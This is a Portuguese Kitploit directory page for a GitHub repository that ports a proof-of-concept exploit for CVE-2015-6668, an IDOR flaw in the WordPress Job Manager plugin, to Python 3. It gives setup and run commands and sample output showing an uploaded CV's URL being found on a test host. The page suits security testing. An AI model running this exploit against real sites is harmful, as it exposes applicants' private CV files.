Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2015-6668 — Evangelos Mourikis POC for CVE-2015-6668 converted for Python 3 | Kitploit
Ferramentas/GitHubGitHub/jimdiroffii/cve-2015-6668
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubjimdiroffii/cve-2015-6668

CVE-2015-6668

Evangelos Mourikis POC for CVE-2015-6668 converted for Python 3

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2015-6668

POC de Evangelos Mourikis para CVE-2015-6668 convertido para Python 3

Explora vulnerabilidade IDOR no plugin Job Manager para WordPress.

Testado em Python 3.11.9

Referências

NIST CVE WPScan Vuln DB

Configuração e Uso

Clone o repositório, configure o ambiente virtual (se desejar), instale requests e execute o script com Python 3.

Clonar

root@kitploit:~
git clone https://github.com/jimdiroffii/CVE-2015-6668.git
cd CVE-2015-6668

Ambiente Virtual Python (opcional)

root@kitploit:~
python3 -m venv .venv
  • Bash
root@kitploit:~
source .venv/bin/activate
  • Powershell
root@kitploit:~
.\.venv\Scripts\activate

Instalar requests

root@kitploit:~
python3 -m pip install requests

Executar exploit.py

root@kitploit:~
python3 ./exploit.py

Saída

root@kitploit:~
$ python3 ./exploit.py
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Baixar ferramenta